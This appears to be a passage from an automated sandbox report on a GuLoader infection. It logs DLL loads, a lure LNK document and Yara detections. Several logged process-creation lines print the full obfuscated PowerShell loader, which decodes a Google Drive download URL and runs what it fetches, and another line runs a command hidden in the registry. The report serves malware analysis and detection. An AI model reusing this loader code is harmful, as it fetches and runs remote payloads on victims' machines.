Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rpcrtremote.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: credssp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntdsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptdlg.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptui.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msoert2.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64win.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64cpu.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: nlaapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rpcrtremote.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: credssp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntdsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windowscodecs.dll

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: COACH APRIL ORDER.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\COACH APRIL ORDER.doc

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 5c561934e089\System.Core.pdb@ source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Management.Automation.pdbpdbion.pdbC source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdbSIL\System.Core\v4.0_4.0.0.0_ source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: FTSKIaM.exe

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000A.00000002.437594507.0000000003477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.436179225.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.609490302.0000000003548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.546777574.0000000003548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.481865683.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.610900947.0000000007D3F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.551538295.0000000007DDF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.438301373.000000000795C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.598344112.0000000002BDC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.531460237.0000000002BAC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.632484069.0000000002C5C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss 